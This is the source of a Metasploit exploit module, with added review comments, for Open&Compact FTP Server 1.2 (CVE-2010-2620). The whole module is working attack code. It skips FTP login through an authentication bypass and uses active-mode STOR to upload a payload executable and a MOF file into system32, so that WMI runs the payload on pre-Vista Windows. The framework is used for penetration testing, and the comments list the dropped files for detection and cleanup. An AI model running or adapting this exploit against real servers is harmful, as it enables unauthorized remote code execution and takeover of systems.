GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/open_ftpd_wbem.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
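# Metasploit exploit module for Open&Compact FTP Server (Open-FTPD) 1.2,
# CVE-2010-2620. It drives the FTP control channel without logging in
# (FTPUSER/FTPPASS are deregistered), serves two files over active-mode data
# connections, and relies on the MOF produced by generate_mof to have WMI run
# the first file.
#
# Host artifacts visible in this file, useful when writing detections or when
# cleaning up a test system: a randomly named .exe under <PATH>/system32 and a
# randomly named .mof under <PATH>/system32/wbem/mof (registered for cleanup
# under wbem\mof\good).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  # Registers the module metadata and options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Open-FTPD 1.2 Arbitrary File Upload",
        'Description' => %q{
          This module exploits multiple vulnerabilities found in Open&Compact FTP
          server. The software contains an authentication bypass vulnerability and a
          arbitrary file upload vulnerability that allows a remote attacker to write
          arbitrary files to the file system as long as there is at least one user
          who has permission.

          Code execution can be achieved by first uploading the payload to the remote
          machine as an exe file, and then upload another mof file, which enables
          WMI (Management Instrumentation service) to execute the uploaded payload.
          Please note that this module currently only works for Windows before Vista.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Serge Gorbunov', # Initial discovery
          'bcoles', # Metasploit
        ],
        'References' => [
          ['OSVDB', '65687'],
          ['EDB', '13932'],
          ['CVE', '2010-2620']
        ],
        'Payload' => {
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        # Aggressive stance: the module initiates the FTP session itself, even
        # though it also includes the TcpServer mixin for the data connection.
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          # Tested on version 1.2 - Windows XP SP3 (EN)
          ['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2012-06-18',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed for
        # this module; all three are recorded as unknown.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      # PATH is used in #exploit as the prefix of the destination file names
      # handed to the FTP server in STOR.
      OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),
      OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
    ])
    deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass
  end

  # Connects to the FTP service and inspects its greeting banner.
  #
  # Only the banner text is matched; the server version is not verified, which
  # is why a match is reported as Detected and nothing stronger.
  #
  # @return [Exploit::CheckCode] Detected when the banner contains
  #   "** Welcome on **", Unknown otherwise
  def check
    connect
    disconnect

    if banner =~ /\*\* Welcome on \*\*/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Unknown
    end
  end

  # TcpServer callback run for each inbound connection to the listener. Sends
  # the file that matches the current stage (@exe first, then @mof) and closes
  # the connection.
  #
  # NOTE(review): the connecting peer is not compared with rhost, so whichever
  # client connects first receives the staged file and advances @stage.
  #
  # @param cli [Object] the accepted client socket
  def on_client_connect(cli)
    case @stage
    when :exe
      print_status("Sending executable (#{@exe.length} bytes)")
      cli.put(@exe)
      @stage = :mof
    when :mof
      print_status("Sending MOF (#{@mof.length} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  # Largely stolen from freefloatftp_wbem.rb
  #
  # Opens a fresh FTP control connection and issues TYPE I, PORT and STOR so
  # that the server connects back to the local listener and stores what it
  # receives as +filename+. No USER/PASS commands are sent.
  #
  # @param filename [String] destination path given to the server in STOR
  # @return [Object] whatever disconnect returns; #exploit uses it as the
  #   condition for the second upload
  def upload(filename)
    # One-second pause before each transfer.
    select(nil, nil, nil, 1)

    peer = "#{rhost}:#{rport}"
    print_status("Trying to upload #{::File.basename(filename)}")
    conn = connect(false, datastore['VERBOSE'])
    # The original interpolated @peer, which is never assigned in this class,
    # so the message carried no address; use the local computed above.
    fail_with(Failure::Unreachable, "#{peer} - Connection failed") unless conn

    # Switch to binary mode
    print_status("Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: Get attacker's IP and source port
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: Convert the IP and port for active mode
    # (PORT takes h1,h2,h3,h4,p1,p2 with the port split into high and low byte)
    src_ip = src_ip.gsub(/\./, ',')
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Tell the FTP server to download our file
    send_cmd(['STOR', filename], false, conn)

    # NOTE(review): printed unconditionally; the STOR call above passes false
    # where the earlier commands pass true, so the reply is presumably not
    # read before success is reported - confirm against send_cmd.
    print_good("Upload successful")
    disconnect(conn)
  end

  # Largely stolen from freefloatftp_wbem.rb
  #
  # Builds the payload executable and the MOF that references it, starts a
  # background thread that performs both uploads, and hands control to the
  # parent implementation via super. The thread is killed when super returns
  # or raises.
  def exploit
    path = datastore['PATH']
    exe_name = "#{path}/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
    mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe

    # Initialised up front so the ensure clause can tell whether the thread
    # was ever created.
    t = nil
    begin
      t = framework.threads.spawn("reqs", false) do
        begin
          # Upload our malicious executable
          u = upload(exe_name)
          # Upload the mof file
          upload(mof_name) if u
          # Cleanup paths are relative; the MOF is looked up under
          # wbem\mof\good rather than the directory it was uploaded to.
          register_file_for_cleanup(::File.basename(exe_name))
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
        rescue ::Exception => e
          # NOTE(review): ::Exception also covers non-StandardError
          # exceptions; narrow it if that breadth is not intended.
          print_error "Upload Failed: #{e.message}"
          cleanup
        end
      end

      super
    ensure
      # Guarded: if spawn itself raised, t is still nil and calling kill on it
      # would replace the original error with a NoMethodError.
      t.kill if t
    end
  end
end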